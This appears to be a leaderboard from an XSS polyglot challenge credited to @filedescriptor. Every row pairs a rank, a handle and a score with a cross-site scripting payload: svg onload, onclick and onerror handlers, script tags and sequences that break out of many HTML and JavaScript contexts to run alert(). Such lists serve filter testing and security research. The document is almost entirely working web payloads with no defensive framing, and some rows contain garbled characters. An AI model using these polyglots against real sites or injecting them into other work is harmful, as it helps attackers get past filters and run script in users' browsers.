244Atom447"+'<svg/onclick=alert().source;;throw'atom';//>
245P3t3r448" onclick=alert(1)//<button ' onclick=alert()//>
246unicornFurnace448" onclick=alert() //<button ' onclick=alert()//>
247smiegles450"'; %0D %0A alert(); %0D %0A onclick=alert(); %0D %0A onerror=alert();
248HITHERE453<script>onclick=alert()</script><div onclick=alert()>
249<input type="bu459<input type="button" value="click" onClick="alert('xss')">
250" onclick=alert461" onclick=alert(1)//<button ' onclick=alert(1)//>*/alert(1)//
251@szexigexi463" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
252xbc467" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)// %0D %0A %0D %0A
253test111488alert()//<div onclick=alert()><img src=1 onerror=alert()><script>alert()</script>alert()
254alert()491onmouseover=alert() " onmouseover=alert() */ onmouseover=alert() */ '<div onclick=alert()>'
255<p" %0A onclick326<p" %0A onclick=alert()//>
256<script>onclick326<p" %0A onclick=alert()//>
257nj326<p" %0A onclick=alert()//>
258Cb329*/-->%0A'"<p onclick=alert()>
259aws338</script><svg onload='-/"/-alert(1)//'
260<div>alert(1);<338</script><svg onload='-/"/-alert(1)//'
261mnbv338</script><svg onload='-/"/-alert(1)//'
262SJj338</script><svg onload='-/"/-alert(1)//'
263John363โ€œ onclick=alert(1)//<button โ€˜ onclick=alert(1)//> */ alert(1)//
264Anon'Ops363โ€œ onclick=alert(1)//<button โ€˜ onclick=alert(1)//> */ alert(1)//
2650x0374javascript://'/</title></style></textarea></script>--><svg onclick=alert()
266,onclick=alert`378//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
267 //'/<@/></scri379 %09 //'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
268uwotm9384//'/<@/></script></div></script>--><select\ %0D %0A */onclick=alert()><o>1<o>2')//"<!--
269sdfs3212<svg onload=" %0D %0A %0D %0A void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; %0D %0A %0D %0A "></svg>
@filedescriptor